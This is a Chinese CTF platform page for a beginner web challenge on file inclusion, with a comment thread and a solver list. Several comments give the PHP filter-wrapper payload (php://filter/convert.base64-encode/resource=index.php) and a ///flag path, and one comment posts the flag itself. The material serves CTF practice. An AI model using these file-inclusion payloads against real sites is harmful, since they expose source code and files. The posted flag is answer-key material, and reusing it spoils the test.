文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12995
提  示:
描  述:
flag{}
评论
CHLing 1年前

file=php://filter/convert.base64-encode/resource=index.php

回复 0

Tolayxu 1年前

跟南邮ctf一摸一样

回复 0

17344057285 1年前

flag{b8aba5bfc55997b3368ac7b88fe3854f}

回复 0

YUMEKO 1年前

http://xxxxxxxxxxxxx/index.php?file=///flag

回复 2

.⎛⎝•̀ω•́⎠⎞. 1年前

php伪协议的简单利用

回复 0

zh2i 2年前

回复 0
YUMEKO 1年前

过分了,谁都知道是伪协议

回复 0

EtHat 2年前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 2年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

WriteUp

image
harry

2 金币

评分(11)

解题动态

18171382569 攻破了该题 15小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
xyqsin 攻破了该题 14天前
问题反馈